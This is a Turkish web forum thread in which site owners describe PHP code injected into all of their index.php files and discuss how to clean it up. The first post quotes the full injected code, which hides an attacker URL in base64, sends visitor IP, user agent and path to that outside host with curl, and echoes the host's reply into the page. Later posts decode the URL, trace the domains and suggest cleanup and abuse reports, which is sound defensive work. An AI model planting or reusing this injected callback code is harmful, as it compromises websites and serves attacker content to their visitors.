|
|
| |||||||
| Güvenlik Virus worm spyware security protection, en son çıkan açıklar ve yamaları, güvenlik dünyasından en son haberler. |
| |
|
| | | LinkBack | Seçenekler |
| |||
| siteme girdiğimde nod32 antivürüs uyarısı verdi. sitemi karantinaya aldı. hosttaki dosyaları incediğimde tüm index.php isimli dosyaların en altına aşağıdaki kod eklenmişti. Kod: <?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
__________________ Güzel Gören, Güzel Düşünür; Güzel Düşünen, Hayatından Lezzet Alır. |
| |||
| Konu hakkında yardımcı olabilirmisiniz acaba. Yeni reseller hesabıma siteleri taşımaya başladım hatta sıfırdan kurduğum sitelerde var hepsinin index.php dosyasına alttaki kodlar eklenmekte siliyorum tekrar ekleniyor. SMF sitem opencart sitem mevcut ve 2 sin dede aynı sorun var. Ne yapmam lazım neden kaynaklanıyor olabilir. PHP- Kodu: |
| |||
| sorunun aynısı 2 gün önce başıma geldi. Bu konu hakkında bir makale yazmıştım : http://www.hptimi.com/looks-for-goog...unu-temizleme/ ssh üzerinden aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA kodunu arattım. Bu kodun geçtiği dosyaları temizledim ve geri sunucuya yükledim. Ayrıca dosyalara 644 chmod izni verdim. Son olarak da ftp şifremi değiştirip format attım Konu develiweb tarafından (19-03-2012 Saat 15:09:33 ) değiştirilmiştir.. |
| |||
| Bunu yapan her kimse siteler üzerinden zombi oluşturuyor bir nevi botnet agı gibi birşey http://adveconfirm.com/ Saldırgan olarak bildirilmiş site! http://adveconfirm.com/stat/stat.php buradan kontrol saglıyor. Bots vs Browsers - Public Bots and User Agents Database and Commentary Arama motorları vs Tarayıcılar - Kamu Arama motorları ve Kullanıcı Ajanlar Veritabanı vs vs. Bunu yapanda bir rus sanırım. Free hosting kullanıyor |
| |||
| Alıntı:
|
| |||
| Sonuç olarak stat/stat.php var online kullanıcılara birşeyler yaptırdıgı kesin zaten. |
| |||
| arkadaşlar dediklerinizi uyguladım aynı kod bendede vardı dünde farklı bir virüs vardı bakalım ben ilk başta ilk açılıştaki sayfadaki scripti alıntı yapmıştım ordan geliyor diye düşünmüştüm ama iframe çıktı dediklerinizi uyguladım şimdi bilgisayara format atıcam inş. kurtulurum bu virüsten yardımlarınız için teşekkür ederim bu arada sorunu düzelten arkadaşlar birdaha virüs bulaştımı onu yazarlarsa çok güzel olur |
| |||
| PHP- Kodu: de aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw base64 decode edersek http://hotlogupdate.com/stat/stat.php çıkıyor hotlogupdate.com domani bizcn.com üzerinden alınmış ve NS adresi qwkspspl.com. qwkspspl.com domani de bizcn.com üzerinden alınmış NS leri qwkspspl.com yine. hotlogupdate sahibi qwkspspl sahibi aynı kişi whoisde Alıntı:
Neyse verdiğiniz kod
http://hotlogupdate.com/stat/stat.php yollluyor Daha sonra da botsvsbrowsers.com sitesinde de Crome dan şukar kişi ziyaret etmiş gibisinden adam genel bir istatisik topluyor kod içerisinde bot net yapısı yok sadece bilği topluyor o da adamın sitesinde yayınlanıyor. botsvsbrowsers.com da MAXIMUMASP.COM da barındırılıyor Şimdi Yapılması gerekenler 1- Bu gibi durumlarda ICANN ilk önce Registart a bildirilmesini söylüyor yani abuse@bizcn.com mail atıp Domain'in kapatılma talebi gönderilmeli 2- info@us-cert.gov e bilği vermek 3- MAXIMUMASP hosting e durum bildirilmeli
__________________ Die Or Kill Oyunumuz artık Android Market' te! Tamamen ÜCRETSİZ> İyi Eglenceler |
![]() |
| Bookmarks |
| Seçenekler | |
| |